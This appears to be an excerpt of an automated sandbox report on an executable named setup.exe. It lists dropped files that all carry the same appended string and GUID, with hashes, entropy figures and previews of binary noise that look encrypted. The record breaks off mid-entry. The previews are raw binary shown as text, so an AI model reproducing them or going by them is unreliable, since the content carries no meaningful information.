              Preview:<?xml}M_...=Xo..>.j.i..C..G..-k@..I...<......\:F....|.(1.Y(.C.....uE.>..u..2..\.#.B|.m..B.......<..gW.D..H...g.4....N.......L^].....2"./.W*.B.....xN.5pI.y..Fz4.f..z.....W.r...A..K@..(^..`?\..<&..^..l....2..f8.....w...%..D..E.M...1.SPu.J9..@......[ly+.2'..b{r......_@..}y.8Z... B.u.e.ws.....e...I........T.......2...Xm...^...._...2Y.........)....^......=.MX../..PS..ju.y....2.F$......F...c3.ki........./.Dc.Wz....71.......,.Aw8.......M.>....&....m....SL]`Q"R..0.=&.j...7...Y......Q..Va.kx.U.....t.f.....2.2....E..J.S.v.....s5Iq..x...4U....#O,.'.. d..cZ..q...~.>.@a..?..{.q5!X.9.....r.4.k.}G..*....?.?..j....."I0B..{?.<T<\........I.....VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):804
              Entropy (8bit):7.684755893999687
              Encrypted:false
              SSDEEP:24:wptWRQkqx6deSQQue+qMQDfIqNynwbtbD:wjW2k060PRoQnqD
              MD5:A21AB787266D832BEFB4A5C5619EB434
              SHA1:35B1246AD63A5065AF3638CBBAB8368A28C21A83
              SHA-256:020761BF3BBA2A2B7993708504A35E9135BC954BF463B3416B28B7E84084184E
              SHA-512:7B384C2642399AE2DF01E9922FD556B891499BE12D3D3809CDE985F66F078EDAEC63F2F485EAE7800F6E27284C8A91657D6E1F49196CF7B49AA8FCC070307D20
              Malicious:false
              Preview:<?xmlM.D.x...9E...J..W.n..?.. ...:@....&5.! F.....Q.q......B.<.....VQ..1.F.~1T.j.*......O....X.v#e)W.{....|...#......Y5f..M...........+...0..L_..?g%.h.t...V.j.i.....@..?..FC.$...`.4Sdx_31n...'L0..}0....O.; .*.4.3..!..EM..H;.....:Fl......wO(#.2eQ..?...../%........'..>|i.:r.T...q...H.9?_..!Q2T.. ...v s.k.}.E..A..R+.9{..v-.N].....V..r.dN.2.Eb0QA.#...~.(.+..px%"e.s...".9....UU....w..w..l$....m.1.{-j-.B......&~...q_..Lx..5P};...[..dx..'..^V...6lA....l13....yx..... .G._..#..n..z.}...rCv..=..!...L.8....A....=.......m..x.C....,.....d.8.N...Z.;...o.Z.).Kt...$.....?T!e6.l. i....H.&.t.....4>..p...7....04.).4=........[.......$.hz..|.......q......F....j.3c..~...I......Y.*.N(...w..h5s,.....--...y./VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):752
              Entropy (8bit):7.677246269416858
              Encrypted:false
              SSDEEP:12:HopmJm0yFLFAXqVlhgKWqZQVmf+uxQ2v5YOCQn0n35PKvurqOx3cpuq2lZL5tiyP:HHJhWyas89x4OCQc3zGpuq2lbLfbD
              MD5:6973C08AAB1A03B6230E093C659AB5E7
              SHA1:D496FB9A37A37F0F0463404B46581F766D2FABC6
              SHA-256:CA19F2433991E61AFF66D410327B00EF1BED3C76587AA128AA91A8E4BB54EEA0
              SHA-512:03B79C731BF15FCEADD5150461E6D781DD3CD2CA2437E7F5920B58D2F6CABE0C7325C5A38809ACE93499906735A411222DB2524DC449EBC44D5AF654831DD39E
              Malicious:false
              Preview:<?xml.D....}@C.)I...C/....<..k..Z.p.;c...m=.{.I.@...+#....2.>(..[...NF?...f.A)..A(..[g..[....:..<0...3,.C....r...7...V..icBz'..PG..M...l..qn. .....2....N..ex.1D.?..sx..T.c....... .?.&..$....2_...qM...z~.-$I.}k..Q...yz.r..>............o.F...+...L....X.6Y..y.[g$.rs1h..U.*h..;.[c.`.o.z.~K ..D...#qD........~y.."....<h..A..._...q.(.D....uW.......B..$.J..L4.0..)q/.Z.R..tP.N....L...+u........0M..)]...(...o..T.:....&~@y..u6...k.y...F..+p..~.R.#...l..U.?..o.t.].8!R.a....p ...u...jL_...7>:C&...1.....$.ZQ.D|..N.N..zn........6C.3.^.Z.~.9...~L..c.9.sT.F.......S.).N.r......2..L...........p(}%...I.a{%.p\m.O...\c*.M..[..dc..bV.`WkO....+.f.P..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):810
              Entropy (8bit):7.715977805325861
              Encrypted:false
              SSDEEP:12:Ck+Xf/DtuYvk8OMJOFxgkUaO/VWTQpeFYwF+4efa5cmnKkLWQqd/Squh5/Pr/Afl:sfrvkcJOFx6BWTQpePzn5cmn3qspkjbD
              MD5:B9EB126B1BDDC5059C55E9576F256582
              SHA1:820878B4911EFD8B58EEEF2E908C1A5F6F53B70E
              SHA-256:042319062CEB36E7CBABD06FD0A8AA7289292EC07138ABB7FC9F3ADE8448C5F4
              SHA-512:267F9FAFE53F66DC5686C8FF7D1AF270FDBFBE9AE4B6A1CFA0C45A8813545D9882B6B5A458175000F83E4826D26A781B69E9AC823644C149B59CFA9C7788EBBE
              Malicious:false
              Preview:<?xml..9.Q0.$.JUu%#....Vj..?"..O?...[. ....r.. ..^S...4...]....M.-...=Av.o5.<*.\...aa.t.u=I....u.......f. ....U........j...'H..D.).....MZ....+>.....T.k..+.....D..|a...Q.. S.,]+..Mi...>.......O.@#...\Bb....%5...{.q~Ff.M@.&..i..\jf_.w`U.6Y...|._...V2..RJu.^U.W..Q.~x.y..H}.U..c.).......xj.....r.^.:U..........q.1x.y..fy.Y.kb.TU.9..C_uQG.%?...ChdMz-]..nC4.&vi....sR........k..R.W..I..t#.....B.tC.....jh..C..o.....U[...mQ....[.0.z>c..5..f^u......E.jk.=..c6.....M...w....-Q.]...9-..w.p.%..../i.....2...oh....Clx.......+f..U....T..y)..9.qQ.&.......o.K*i..]wo.W.7.^.,o.z/0...GSt..[n.<...&."..K5xI..>.....e......|.h.,Vu8.e.......%....e".....:..a.."^J.).O..+&....H0.ON.~8L/.W.?.L%....Z.ZO..z......./....VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):752
              Entropy (8bit):7.736159309032705
              Encrypted:false
              SSDEEP:12:9sVqWPZ1z+pR92MqrTdDqoc/CGPUZF9kRZ7AB3InyPIQA8akGs6i5V9ZsMR2ciik:9sVqWPZ1ypRMMq5JhGXRZ7b8ICaNbeVy
              MD5:FB7ECC5295FD68A7A97A12922FAF95C2
              SHA1:96E47164528F3D834993C16D2107877D306B2503
              SHA-256:721622CEDBF0F042930ED8E5395560180DCEF2666DD5AFABAF613BC3FB4F3265
              SHA-512:F45EB22DE2BA820B93ECBBFAC3D92C26B4FEECBABED35CF7F4B2E3540922C317286BCE0ADDE28B810892AF6E01ABF57C86867EF2C852DEDA9BAD3A885AB91C2B
              Malicious:false
              Preview:<?xml.........aN..r...M....W(.pM>?.p2w>_2....53o..T.ahx..d"".H~.*X....}*.l....J....!K.&...xZ.. ....#u:%....(l..^..7Ew....,G.f..wHTv....^Z7..2..a.W?..FI....z.A.ve.?f..z.4.Z0bz'9X...(.rX.P...H..6.>."..g..{.SY.&.n..+.>U........G.~..A3.C.>8.r..y.U..&..&b...AU.F...y.c.v.5.Jt.&.7Q".y....t...i.]......K...k.UV...B.x....|g..X.n]...g....#hMu.cx..Q`.......I..o3....:./.n..W.......YY...%..`".i.|....+.....g;s^d...JI.b;...X...r_K.b..s.4.$-I....~n$....q.W.z......9l...:..8A.......Z..c.f.>.=.;.9s.{ ......W.%..k.a..=5c.....9...5.V...K..&O.?...A.:.<S.~....&.5ey.^t....R..#.6yx..@.....p.(.{e.<6...X....'..J..........2..h3;.2MDB......Ae).P.....M..9ZXe..WY.\..~D.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):810
              Entropy (8bit):7.774512016442393
              Encrypted:false
              SSDEEP:24:y29Z+cINduWwSNTFe8SLM+8uw3/EpjlcKc3YpOKbD:YduYNTwLSVKc3YpOoD
              MD5:3A425D6F27F3F8DF523579370A4A236C
              SHA1:F6271309D997B399524E4318488B4E5DFDF75069
              SHA-256:2CF6F52557E7FC304DC494B1FD7B4846D74B33FDCC4A9D35EBDCF9BE1ADB9A55
              SHA-512:CE3FD5572EAD57F7852DAAED29D8590785D47FF07619B0723B7194ECA70DF92833814C74D173F1D121A92FBCBB8C373C04A5454A94055CCEB25B537A39DF550A
              Malicious:false
              Preview:<?xml.^.I.........X.2....Ve.....s|.~...5T+.4.;..W.....O.<-.pnD|.......PM.T......m.(.b...}aa.iU.Y'1..u%..@..c..P.. QW.h(...._......5..u..8..X..su.ryj....v......+w..+.>.QP....A.Z.d.5......w.n]..Q....,.w.*X.b...DBr.`C..l......>.......d`.Tn..I.=..........S*.'..v6.......q+.....\.u.....i .W.o].Q...W"2w..wx4A,....}.....u..<..?..:.q.W. ......7..d.}.oR..>.`...!~o.......Z.'.H..e].S.f..<..c.......w...:..!E&$\_....h.,..j_x..&..g&u...0..9Q,.'.L3.c.c,?....}.>y........9,.$}.'..;..E[.S../....<..5V....N.0>.`.....M,Kb.7..H...^*...u...".hc....+U.....j!......N=..\..../.)T..pnaV...y2i..8.z[-..F..h=..-....,:.j..H...a....Rj......h.._k!....K...+$....6....1...d..=.F.q$.&.j..vK..i.....u..5....!m.2...(-..G......VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):752
              Entropy (8bit):7.7149091935092216
              Encrypted:false
              SSDEEP:12:vWmr8eI7mUVJM+AsQJJN6xF/Ukh+YZn01g6S3jC6iVpeC1lFjSEsbgKksRs7LAxp:vLoNVJTAzkZZ01CCpp9jSEhKk8s7LAUQ
              MD5:E3C47E89D0FFC0A8786832E64D6DA988
              SHA1:8D950B88FAB08681C4E03C94F8878458CC5F9CE8
              SHA-256:25F1103D073A92BE2D507321C04CF092863393ACB85523889411313B151BAC08
              SHA-512:3798ECBEFB626234FFC5CEC201B3BB83478E0CC062F323163F8CBD6F66F1C9C8BCA26D53D40871FE744743385D96700146DD3F11BFACEBAB8B30CA7ED42E5F9A
              Malicious:false
              Preview:<?xmlP]...P.w...R"......|'.....w.#....$..iW.?....l.E.MD..w+,.....lg\..CB].K..Y.3G...D...%.....X...o}7.....\..<.L.....F..+......<1..4..0.v;.....N....P.&{(........&....{.."..&$_....j....".~...-B...8.s,....1..&a.../.b.R......?.G..E....A(.Kz..1Z.9..doxa<.i.....!...\Z.c...P..(...~.r..(.H_ ......`66.2(...!.,.......]...~...n+.Id.]...."p.H...I#.(.Wt...=k..oM.....+h$..........|...%....t.6..~z...+5eJ%ot.....J....0.V..Jk.i..7.;{.^..Ox\....aG....$..>.....'..U....r..,....2.Op..i..7....F'.H.-......}.sbT..h@[)._7.KTE%|<sVY-...HY2.....e..r...to............s_.]0w.A....6+..qI.`Df*.._9..R.B...#.w.MU...p....A.-z..Q....4..nn.....!.I...2g.*\VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):805
              Entropy (8bit):7.7122110161402
              Encrypted:false
              SSDEEP:12:bqauK63MmlIbftVCVEJx+3RGapzFvvhZdSFEA3anNIH9N86uiX8LsMR2cii9a:WrK63VY1s6+QajvdE3gNE9K6rrbD
              MD5:2539F4447611FD5B8DCE6C6746904AB4
              SHA1:1CC93FFB7A5FE85EC3BDD1D50C19BE3A2F7D2977
              SHA-256:272ABD5E396DD58C020E0880FD931F1DF9219C62D9E0DE05D3BBB317A62C8BD3
              SHA-512:BEF83E2C543BFBF907450F675C6CFAD73F18017C32918ECF387FC32971F6C32DC49E80CD590C74E0D178558E2A398F703EEE2EFD9F55799BDB2CFCAA0697FB75
              Malicious:false
              Preview:<?xmlpI../u.7.8./.N..L>.Xr....!b.....p.s3IQ....k.Ru,X.....,c..U..#.y.......&`.0i{.Rb.%W...R.....#....A.N7...H.#d7vU.E..!...\Z..^...%.......J.m..c.....b...'..v..[...?.uU..%..O......@f..n...)K>..3..L.'_*.@.\............;....im..z..eH........Nh..A`.:....G....j..:K.g.q(...V.r.@.....R........5..pJ.(O..e.4.. e.......t . n.......GX.5..Q.....|.....&..'_..../._.goQ.L...c.c.^...........<....\@}..e..!)X........]].^0..R......[.j.%}..,.......!....f.R,.........=..EFW%-...`...o..i.{....=....-@.~xf.".....q..R..h....:%..K..I.\.B-.%f.yG.r&..H..*j...X.......Fz.u.ac{)[...G{..Iq.ne..K.F.u..k.....k8LRWv.%..u.Z..P.u$TT<...8.e..Ziy.|....=[....L." P..(.+..V.;....3)..\..et...Vfy ...@,..!...:.g.."F^...VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):801
              Entropy (8bit):7.6830674377501955
              Encrypted:false
              SSDEEP:12:2x8CKG3Mkzh6fuWko3LGvdKrLuyvj3KOzKLwSylthDhR9V5n/0OMzsMR2cii9a:2FZzhs3LCKrCsfzKLwxhD9VMYbD
              MD5:67C237E5DEF5D2B7B15A63FBB56856D8
              SHA1:A249BB4DD91021A9065588D517BB56B262E6CF86
              SHA-256:DF9D361C5206A663AC513D4E59CC7A8828B26F790A6F5CFA5C60FD16175AF5D2
              SHA-512:4C5777984B21F1236BD7F79A380C0C4D58D5653DBC76EA165AA370D6BECCE36CC4AC903F0FD223C2FE7067F42DF7132D178EF86D90A95B2B258DEB80C9EACC25
              Malicious:false
              Preview:<?xml..N....S.[).L.u..................|.9..<Y...,.C3#X..A..AuK.h...n....^.5s.....N......x.6.`.Y`..}W..u#...cb.C.d......{...tY<.a .F.$^..y..w....2I......:!s..F...q..IO.k.......?.D.H.#...U...C.VV.....6.....s.<v.....N..vb.c..*'$C..j...=.[9...7...d.....D...j..}.....A.7..~.T....I.L.K..)....8.&V 4}.Dz.O9.@....\.n[...be.J..&..3..JC...U..K..5.'....N..)...j.V......#.......5:..V7^....M-1..{~..i.......y.fAOA....zg=./k.c.b..l..f)vU.o..^.W{.BD.B'.$..2.#.sQ.....n...x-.J..KOv.......x.exep...$..f......Jh....W-C..#.c.[..-.|....E..;!,..y.S.8.{.o.j.9?.......Q..0..K...o.k.R.Ju..E...K..~.{...&.. \.w.V..I;.(...M.s.Vs..T.}3..CG.jd.......'..DyB].y.i+v{...2{...k.-.[.............S.......Rg..P.@V.7..P.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):818
              Entropy (8bit):7.75759401581867
              Encrypted:false
              SSDEEP:24:fU8O8kqKxIfGrOwuotbl3U4Esij5u+TgiqEHbD:fUEJr+VXYsi1uigiXD
              MD5:8CA1914CC06455BEAC24EBD9CF430776
              SHA1:C57CE11304DB390DAE28C41A9AB47C3A8CB8B62C
              SHA-256:A60A2A88DE70B5BAD25BC858F088CD8B3DC453082988E3F8788973E7F48A37B9
              SHA-512:EFA218370C72CDF593E38775533058FC531AABA5A73C857D65353577B0FD195A841451C003F403FD9C447D820063C04CF488C2BA0E4B267326620993DCB2EF66
              Malicious:false
              Preview:<?xml.%O..Wwo....h4m!s..h..s2.(..q..JN.=....{E0....+.F..Z ..)..A.J.&V........\..u..IOr...]|..*K...Q.:.....V.F......I....B..jI....'.....SD.. Fh.@n.x.H.. ...@.4..T.~.!......E*Z=.c7....$..;.B.i-..yL^.......s.........F .jM.-XTD....f.M.&]...5.+7^>.....x.d.`..ljh...on`..hg.%.B.Q.U.Er.../.?o.}...oB7..n..`.[....1..K.,..tk./..(.S[...%........r8..r.+...#...80Pi..r...b....O.R^s...'.0ZF.....1?.........'R.U...Jf...B.O._....f.OY...aj..._..S...`._......}.g.u. .%-R...C.6..(+s.9~(...j...\..?D....K.z..q..cW ....T...,@X|.%.yw..........e!.~...1.....5B.y..P...e..3...~.:.-.S5.....2:aCzw...V.. :..S...G............6..tb..X.PA...7/......'..lv6W...8.$c0.)iA...?...W6c,S.'A...mJ.J...+.K..l...?&....E... .w...#.._t..Wgz[VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):744
              Entropy (8bit):7.693621092168042
              Encrypted:false
              SSDEEP:12:EudqfkLHkYt76UPiRFvrfLJl7eRe9llIV2Vd6TTvwRHh0iR/qqxsMR2cii9a:tdqfwEYt3KDrt4o97ZYLwRdSbD
              MD5:6A2D53AC14E00671056F922D585C5C27
              SHA1:09043D5A5614A27B92428F3FADE6D892E7E33E1B
              SHA-256:FE89A58BFF57AFB30C7B4F8E1D30EB5AD6C11C277406F87531FFAC73A1C37576
              SHA-512:432710B805DE6EDD2588F72EFC4513048DEADFB717BE8F7A5443F17A7F40DD368DF9D794523EDBAD7C9E2D48EDDD3F1D0CE07B268564364814540E6F20650D9E
              Malicious:false
              Preview:<?xml9y}S......K"....f.....w[c/..G...|....+|.-.e.g.,]V.2.h.iZ5_R...~..s...ax..61.y..>....6.....\o....WT.....K..L>...6...d../...V..d.!o...{...w......j.Q.).-......"UH..=j.........\o...........X..L.~.S...ZV.9..J....&.......7L...=.."x...ikk..Qs6k.x..@. .}J.F.JW....x`......Wy'n..c..,.Se.]Z{1i.#.:.T..rIJ..!.9..x.\~!$...../[.8.thv..x.50..0a.o...l.]0/.....n..QR,<=c#6.r..A./p....kA.l.....M...Z../!....O..>.V.g...S3.H).8...Lm`b...-.G...dx...~..s^!@.{$.#F..sb\.F.%..>..@.t:...y.N}....'8..n..*.E........f.F.Sq."J.B.&<|9.Wo.*...,fe.........+...7=6$>...(..7<..k.`%..[..t!#X.Z."..S.....b...mV...N$i..`...>F;o..j..8-.5A.;`.E?.Y.g.J.2...F.@..U.\.^..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):803
              Entropy (8bit):7.743138856572214
              Encrypted:false
              SSDEEP:12:BiyM/z90/hstwQIZ5dPmQ5mbaf5ha7LnYbWBCRmFtCJY7kLcTxaUUXvkU/5sMR2X:BitxICtwQy5tTnmgbItjVM9mbD
              MD5:90AB0331102F538854BA4D4D43436FA2
              SHA1:94A776D4AD976026438A05BB9FD7A4FA7A06721A
              SHA-256:3266A755318B959A5FB6A4BA0B603B65AD4248A11947B3D66EBC01CF059ECA8D
              SHA-512:1EB74A2F8BB88D4DC338563E1353C96BC6F0704A9C6814E2D5DF0528BD11CAF7E5579A694FE093BDD11A2E9D02AD96FF8AECE62A089058993A3F1A4EBCE121CA
              Malicious:false
              Preview:<?xmlG.......x5..q..........-..w."P..(.f...xP...<'>.T..l.l...9(..#R.)....Z.'..W..[.w.1.@.{..#.......3.l.v^...TA.~`J=.3?Fe.|.R..... _G".^.,.}...Ksp....s...|..(L)...5...G.....n".W.P....f.B.v..A.5.G3G....".V.h-..&..7.I.....s.0:..N..o5.,X..L.... ..FH.?....A.._h.c.On-o..sTE....<.@.2.^.u.`K?.].&..+...>..(...TrE... `.i....!........,.F.>.g.EY..W.............:.....j.R.Ct....5J.`.(...G..!_.F;x.A..Q.g.7. i.,.(f.%..7...1h.(./G..`.<H+.&.......5...)Pv...j.R<...=..E...{.....@P'...~"S..K...[..5O......@S.K.&6...(..B').N[..j.y4..+..eF`.8........4M.$'...:g.U......r..d.! ....%..D... .<.V.o.p.ox...k".......|q]....:....(..f$.J$P....D.7q..Fj.;A.G.j.\..h.E.Zk.ij.|a.....H..$l.....V.....!...K_..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):760
              Entropy (8bit):7.715311709561893
              Encrypted:false
              SSDEEP:12:tfv1D5zLazvTGM0D+SUcjtATsGAkE2uSrP4OT9MeyMlyt4Cvs0LpuIub+DVvLyxK:V1D53aOGcjtATsGAk+uPRMRMlat3pdf/
              MD5:317535A848481D34DBACDC7583368EC5
              SHA1:3D607CC41384CFC220016D0496349D361FF3FF05
              SHA-256:346257B34ED1955C411B8FFA446F4279305A0572A5A2AE74C797AA170976FE20
              SHA-512:6E45DB1A86F9B89A6A665F7B0706CE361421A146569F7B6D96D430EEE0163182E7B1B9528537EFE7B40AE8F6970AAF4A194E114CB191EFFF3BF6AF878F87494A
              Malicious:false
              Preview:<?xmlG...A....'Z.D.-.$hh.. D8.3.4cK...y.SNg..'?..... H...O...x..V.n...A.5!.....w}...G..@.....:1..n.FZ.s..BN.t.]...'..S...r.$....*l..yT............i.S..^#....S.2i...p=T[..=.Tn.|[{fD.It~..+...>..h...jm...v..z..L9.".l\.@T..`i..A`qz...mS../...r*.ah..]....7..N>...m.DxZ.|...bZ.f..u.V.dY.6..kXaq7X.....#A.<._S..5.I\.....N..3.D.A...I!.N I60,.......8......m.}.`.j.,W....O.!..m\.b.E.7...S.y@c..P*.H..3.........%.=E.....a,U.HA..M..ll2....I.t..s.PR.q.s.....#n!@.$..tf9.b...b..f%.2e)..\g.q...#d.....bl......O<Lh..A.;.....V%.I.. ...*y..-...../..;..m. ....d..9..-.i........._..sv.[Q. g+.......2....QB.b.I#<#..;.&...bw. ...\..4....e...:wg.]8.T....e\-....I5....lg<..4..M....."VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):835
              Entropy (8bit):7.7255263612090985
              Encrypted:false
              SSDEEP:24:Ngh6NiEnLVP2EjI7qcbIygp3Zt6XzB+6PRvx3zXbD:y6NLVs7bdgFa1+65vx3zrD
              MD5:5429CFC921D5CB1AA03E4A1ADC368EE9
              SHA1:18E52F3605835C32B062648A8A5B24C2430C7224
              SHA-256:D03D569A83F4486E5031E8535E56832076DE7254193B28232EF28ABF30F281B9
              SHA-512:DBE0F9D71EB17584D5FA4A2E4AE726B388186B9823D16D029A1B0A216DD13AEC6326F9C641A2460BE40733570D8073BD4D16B1E9617A4221F2A50A682DC9865B
              Malicious:false
              Preview:<?xml&.s..?c...9.9.@R.&.s..[.N=O..3.Df..#IN..y..5...L..X..I.a.t....#3/..%.:m.*).4V..F9..S>.....[w..h...!x..&I9..N.......M...P.......i(a.e5..^.B.....k....K5`.Fh/..c}.XK.X.....M.6Uv7B.g.R..=./!.....}..s.....K..%. .3.....qWv.......85........n......'.{.~.--hM..T}.V.R7.z.....m.3g...f..."......(..M.*.S......"...CZ|#....w......}8.$.|..nI........'.......[[.4.q...T..Yqk...Y......Q.r..i...kQ./Z.......h..g.3.]U.,'o..."..U.ob....R......N...Ju#.&..B.N<.i..Vs...jD.H^...!.......nX..?..N.%H.g.B..=.}.J...F&..,..(...s....s}On.....e...K.k}.#W...Q...].~.....:r....[..;.*...@....M.-...5i$g..>8i[U..........aR...G..v.............c..\....Pj*;Cj...,p..s...sF<q[.)..N_..R$..q.r?..n0....9.......4......%C.f.y._O6.G.!/W./.$..uy....DDr.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):740
              Entropy (8bit):7.707322557694987
              Encrypted:false
              SSDEEP:12:Sm41JP2cfWioxi39GYOxPB2q1lUgC5yhxEDRIrKyguTu/9whhsRuGhsMR2cii9a:Q1ZRoxitGmclUTrlIWCTu/9whhUhObD
              MD5:1F4A05DDD1178566D566CE18519CD0FF
              SHA1:A72D5BF9175857F09911953C4B880674774D06C9
              SHA-256:E7774149B7D0E9EB0CA320E6731F34292B4C404C726B43743556118748269987
              SHA-512:9FEA10F1ACCE594A4EBE423D804D7BC5105F10CA6A738CD09F2CF8F822668A7CF95AA83FA9E783ED0604AA280883FC2887452D4D2DFB480AFE3FC787EFDB20D8
              Malicious:false
              Preview:<?xml...!IWB......Gr..s....8].Sn_2.+.I.....T..'.Ay~.x.<^..e..@.|..q.p..FDD.....o....:[M..o?sI........'.&=.`..w.._?.G.g.."..n].X.........+.YxE...k..Cy...4..V..?v...")...l...RuQ.<......Z....2R.0....6S.N8..S;..|k.nd[Zb.`.l.O......a.b...C......$.g.........Ax..H......u.\.....K.....zr.@.........../..b=.~.X.(u*.f.>L.b....bl... .>...Fn*.oAS........ .KE+...hhrY.G.U$jC..:;.....p.rG:.}.+)..Qb..u[...#<h..b..%b..m@.d.....!...v...)...[...F..()!.#{.wt.4....`S+..I.55.(..%....=..H.O.l..P..h.`.v;..............N!.s$..U7.V".Z.Ot.....M....jR...I.mg.....y.......D...?<..{.S..S?'.x.@.4.s-.b._.....,b5D.~..w....quS28.*.z..(..D^$1...q.&..1I.J....8b.?e:.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):807
              Entropy (8bit):7.720968666960391
              Encrypted:false
              SSDEEP:24:hIX9L++ej7aHvXDxx5pEgl2tvUK95x4bD:+X9iZjuFx5WI2tUKtiD
              MD5:9BB1AEBC8BBA69659D9732D4EF74B793
              SHA1:1069F5BD1D086DD3EA7ED8E69C37649D6A0D381F
              SHA-256:1E29558B89B5C4651B1DCF249279F247935711021E561153B8969A85DC002D93
              SHA-512:1B40508AA199EA586389DD0B105DFB25911EF85C659165772DEA6BD2F65CAEC132FA85EAA7B0DF79AF4A64A427D5404883F539C9F6BCA20164C49933E394153B
              Malicious:false
              Preview:<?xml("/.3...=.{....1kIW..`.*...5,#-Hk.p.........._.@....w.bmjvG.c....cC....b*..X........7..*.yZ.g.].....1C....1.F).k.u.....dAI.|...2..+.....=.s.l......@.....o..&D.{.3.[z<.....R...;!.QU\..p...3T"...e...X...w....>.&}....|9l8..}....5+..j.v..8..U.....@.y.k.v../.~H6.-.....}...9..9....zc..*.....E...@*.<.;.@..7<...b.F.k....].syc.R....u '.l.R..H..r..%.A.!.-.A.N.....Fx...6..c.Y5...@.d.[\Fi.g....4l..M0..1....7....Q.....EsO..a...&v..e..I...@....O.%fZW.,..<'.U..LU..V.....F.fE.....%. .._.k84N-1..,n...;.D.....5..>.....T.#.WD:./2.E1u.....w...f,.%...j..x..e.......A...L...b..V.....6v.oB..c,.L,.w.....;..v._....=.(...y'L.........f..DA..2.-...+Eqev..g...2......./..,..k...i>..@..1.:+.-."D...~..,.......v^"....5.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):741
              Entropy (8bit):7.733935557150579
              Encrypted:false
              SSDEEP:12:YDmxLVe1dDCA3gJhjXsMkuCIIbQ0EJobeo64M+203Fv6ultALfn9XJgm0gUSny8Z:YiE1sA3YjXsMk93QVobT64q03l6uTAL5
              MD5:F133D2586CBEE6D5013F29E113A39F58
              SHA1:4A0EF244F75C50A6F70526F1AC6F477601A25FF0
              SHA-256:9FDCAC3A0B4B7BD6E7BABF6890554EAD1AC6E099FC58FEA1B61415D26635F5B8
              SHA-512:C8153668B1CD527A4C726E46146F65CF2B359F85C00674043985BDC10FAB3211E17E478C20B179706D915AC506C2809D99D5C580F26C08320B0B4FB0A62DE7ED
              Malicious:false
              Preview:<?xmle.....nGn.L....&...d..q....U..!'^....l........s...:..#QP...k.Pb....S{...E...e...b...^..zU-...W...7.(.g_..O....9t..E...T...%.!.o.5.....'..9>.0.Nh..J..C@fKB.S^P.o..GY.17E....A..vi.PI....`........>..Y.].|.5t.8...b;.}........!.X...R..=@S...A.v*+...X..5...:Z.fp.>..\..nS0m}... .t....V.'..%.v...Z0p|....Q..t..9.....@.....R.e..4~..i.A.?...}.I.F.klj.w.....8S!.>....g.D.......Y...;.OX.\knW..._.)..WfY....._....$...6.<g..b-.U.Fk....<.j..e.![PL=.."J..^6.~...*m..7./.]xWd....b.+.:...n.I....Y.D.^...g.Z..p.q...-..k/......A..,Y|)..Be..`.2xY|..."..%L../ ..xM..#.3l.-'......@h.......t..........2.X.M.~.(...z..a..f.>.V.....,.BB....e..s....a'.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):802
              Entropy (8bit):7.705866369846681
              Encrypted:false
